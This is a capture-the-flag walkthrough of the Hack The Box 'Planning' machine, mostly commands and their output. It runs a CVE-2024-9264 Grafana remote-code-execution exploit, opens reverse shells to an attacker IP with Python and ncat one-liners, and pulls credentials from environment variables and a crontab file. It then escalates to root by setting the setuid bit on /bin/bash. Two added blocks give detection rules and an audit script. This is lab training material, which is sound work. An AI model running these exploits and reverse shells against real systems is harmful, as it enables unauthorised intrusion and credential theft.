Here is my note on the PLANNING box from Hack The Box.
PLANNING: 10.129.88.117
As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62fff6d4578805adf4d3de5b9bf850f1 (ECDSA)
|_ 256 4cce7d5cfb2da09e9fbdf55c5e61508a (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.129.88.117
+ Target Hostname: 10.129.88.117
+ Target Port: 80
+ Start Time: 2025-05-27 14:19:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.24.0 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://planning.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 8102 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2025-05-27 14:24:50 (GMT-4) (308 seconds)
---------------------------------------------------------------------------
https://github.com/themewagon/Edukate/ - Original Source of planning.htb
VHOST Enumeration:
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://planning.htb/ -H "Host: FUZZ.planning.htb"
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://planning.htb/ -H "Host: FUZZ.planning.htb" --fs 178
grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 40ms]
grafana.planning.htb:
Grafana v11.0.0
admin:0D5oT70Fq13EvB5r - WORKS !
https://github.com/nollium/CVE-2024-9264
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING/CVE-2024-9264]
└─# python3 CVE-2024-9264.py http://grafana.planning.htb -u admin -p 0D5oT70Fq13EvB5r -c whoami
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: whoami
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('whoami >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
root
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING/CVE-2024-9264]
└─# python3 CVE-2024-9264.py http://grafana.planning.htb -u admin -p 0D5oT70Fq13EvB5r -c id
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: id
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('id >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
uid=0(root) gid=0(root) groups=0(root)
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING/CVE-2024-9264]
└─# python3 CVE-2024-9264.py http://grafana.planning.htb -u admin -p 0D5oT70Fq13EvB5r -c hostname
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: hostname
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('hostname >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
7ce659d667d7
RCE ACHIEVED !
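Detection side of the queries above, as an added example (not part of the original note or of the linked PoC): it scans Grafana query request bodies for the DuckDB statements printed in the output. The JSON body shape (queries[].type == "sql", queries[].expression, refId) and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Rules derived from the DuckDB statements printed in the output above.
RULES = {
    "extension_install": re.compile(r"\binstall\s+\w+\s+from\s+community\b", re.I),
    "shellfs_load": re.compile(r"\bload\s+shellfs\b", re.I),
    "piped_read": re.compile(r"\bread_(?:csv|blob)\s*\(\s*'[^']*\|\s*'", re.I),
    "local_file_read": re.compile(r"\bread_(?:csv|blob)\s*\(\s*'/", re.I),
}

def scan_query_body(body: str) -> list[tuple[str, str]]:
    """Return (refId, rule) for every SQL expression that matches a rule."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    queries = doc.get("queries", []) if isinstance(doc, dict) else []
    hits = []
    for q in queries:
        # Assumed body shape: SQL expressions carry type "sql" and the
        # statement text in "expression"; other expression types are skipped.
        if not isinstance(q, dict) or q.get("type") != "sql":
            continue
        expr = str(q.get("expression", ""))
        hits += [(str(q.get("refId", "?")), name)
                 for name, rx in RULES.items() if rx.search(expr)]
    return hits

def _body(*queries: dict) -> str:
    return json.dumps({"queries": list(queries)})

# Constructed request bodies; the statements are the ones shown in the output.
STAGE_1 = _body({"refId": "B", "type": "sql", "expression":
    "SELECT 1;install shellfs from community;LOAD shellfs;"
    "SELECT * FROM read_csv('whoami >/tmp/grafana_cmd_output 2>&1 |')"})
STAGE_2 = _body({"refId": "B", "type": "sql", "expression":
    "SELECT content FROM read_blob('/tmp/grafana_cmd_output')"})
BENIGN = _body({"refId": "A", "type": "math", "expression": "$A * 2"},
               {"refId": "C", "type": "sql", "expression": "SELECT * FROM A"})

if __name__ == "__main__":
    for label, body in [("stage1", STAGE_1), ("stage2", STAGE_2), ("benign", BENIGN)]:
        print(label, scan_query_body(body))
```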
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.160",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'"
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING/CVE-2024-9264]
└─# python3 CVE-2024-9264.py http://grafana.planning.htb -u admin -p 0D5oT70Fq13EvB5r -c '/tmp/ncat -nv 10.10.14.160 1234 -e /bin/bash'
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: /tmp/ncat -nv 10.10.14.160 1234 -e /bin/bash
┌──(root㉿kali)-[/home/kali/BOXES/PLANNING]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.160] from (UNKNOWN) [10.129.88.117] 51162
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
hostname
7ce659d667d7
WORKS but in DOCKER-ENV !
python3 -c 'import pty; pty.spawn("/bin/bash")'
ls
LICENSE
bin
conf
public
pwd
/usr/share/grafana
uid=0(root) gid=0(root) groups=0(root)
cd /var/lib
ls
apt
dpkg
grafana
misc
pam
shells.state
systemd
cd grafana
ls
csv
grafana.db
pdf
plugins
png
pwd
/var/lib/grafana
exit
meterpreter > download /var/lib/grafana/grafana.db
[*] Downloading: /var/lib/grafana/grafana.db -> /home/kali/BOXES/PUPPY/grafana.db
[*] Downloaded 980.00 KiB of 980.00 KiB (100.0%): /var/lib/grafana/grafana.db -> /home/kali/BOXES/PUPPY/grafana.db
[*] Completed : /var/lib/grafana/grafana.db -> /home/kali/BOXES/PUPPY/grafana.db
Download it through a Meterpreter session as usual.
env
NCAT_LOCAL_ADDR=172.17.0.2
AWS_AUTH_SESSION_DURATION=15m
HOSTNAME=7ce659d667d7
PWD=/tmp
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_HOME=/usr/share/grafana
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
HOME=/usr/share/grafana
NCAT_LOCAL_PORT=48514
NCAT_REMOTE_PORT=1234
AWS_AUTH_EXTERNAL_ID=
SHLVL=1
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
NCAT_PROTO=TCP
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
Found enzo's credentials.
enzo:RioTecRANDEntANT!
ssh enzo@10.129.88.117
enzo@planning:~$ whoami
enzo
enzo@planning:~$ hostname
planning
ENZO SHELL !
enzo@planning:~$ whoami
enzo
enzo@planning:~$ hostname
planning
enzo@planning:~$ cat user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
enzo@planning:~$ sudo -l
[sudo] password for enzo:
Sorry, user enzo may not run sudo on planning.
enzo@planning:~$ id
uid=1000(enzo) gid=1000(enzo) groups=1000(enzo)
no sudo -l
no gcc
no kernel exploit.
no SUID3NUM.
no crontab
no pspy
netstat -tulpn:
[SNIP]
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
chisel server -p 53 --reverse
./chisel client 10.10.14.160:53 R:8000:127.0.0.1:8000
enzo@planning:/opt$ cd crontabs
enzo@planning:/opt/crontabs$ ls
crontab.db
enzo@planning:/opt/crontabs$ ls -lah
total 12K
drwxr-xr-x 2 root root 4.0K May 27 18:09 .
drwxr-xr-x 4 root root 4.0K Feb 28 19:21 ..
-rw-r--r-- 1 root root 737 May 27 20:27 crontab.db
enzo@planning:/opt/crontabs$ cat crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
root:P4ssw0rdS0pRi0T3c for 127.0.0.1:8000
127.0.0.1:8000 = crontab as root
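An audit for the weaknesses the crontab.db above exposes (mode 644 and a password passed with zip -P), as an added example that is not part of the original note. It assumes the one-JSON-object-per-line layout shown above and treats the "logging" field as whether job output is recorded; the sample records and the EXAMPLE-SECRET value are constructed.

```python
import json
import re
import stat

# zip -P <password> as in the job above, plus the generic --password form.
SECRET_ARG = re.compile(r"(?<=\s)(-P\s+|--password[=\s]\s*)(\S+)")

def redact(command: str) -> str:
    """Replace secret option values so the report does not leak them again."""
    return SECRET_ARG.sub(lambda m: m.group(1) + "<redacted>", command)

def audit_crontab_db(text: str, mode: int) -> list[tuple[str, str]]:
    """Return (job name, finding) pairs for a JSON-lines job store."""
    findings = []
    if mode & stat.S_IROTH:
        findings.append(("<file>", "readable by every local user"))
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            job = json.loads(line)
        except json.JSONDecodeError:
            findings.append((f"line {lineno}", "unparseable record"))
            continue
        name = str(job.get("name", f"line {lineno}"))
        command = str(job.get("command", ""))
        if SECRET_ARG.search(command):
            findings.append((name, "secret in command: " + redact(command)))
        if str(job.get("logging", "")).lower() != "true":
            findings.append((name, "job output is not logged"))
    return findings

# Constructed sample in the same record layout as the file shown above.
SAMPLE_DB = "\n".join([
    json.dumps({"name": "Backup", "schedule": "@daily", "logging": "false",
                "command": "zip -P EXAMPLE-SECRET /var/backups/a.zip /var/backups/a.tar.gz"}),
    json.dumps({"name": "Cleanup", "schedule": "* * * * *", "logging": "true",
                "command": "/root/scripts/cleanup.sh"}),
])

if __name__ == "__main__":
    # 0o100644 is the -rw-r--r-- mode from the ls -lah output above.
    for name, finding in audit_crontab_db(SAMPLE_DB, 0o100644):
        print(f"{name}: {finding}")
```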
We can edit a job there to run chmod u+s /bin/bash as usual.
enzo@planning:/opt/crontabs$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 31 2024 /bin/bash
enzo@planning:/opt/crontabs$ /bin/bash -p
bash-5.2# whoami
root
bash-5.2# id
uid=1000(enzo) gid=1000(enzo) euid=0(root) groups=1000(enzo)
bash-5.2# hostname
planning
ROOT-SHELL !
https://mux1337.gitbook.io/write-up-_/hack-the-box/machines/planning
bash-5.2# whoami
root
bash-5.2# hostname
planning
bash-5.2# pwd
/root
bash-5.2# ls
root.txt scripts
bash-5.2# cat root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
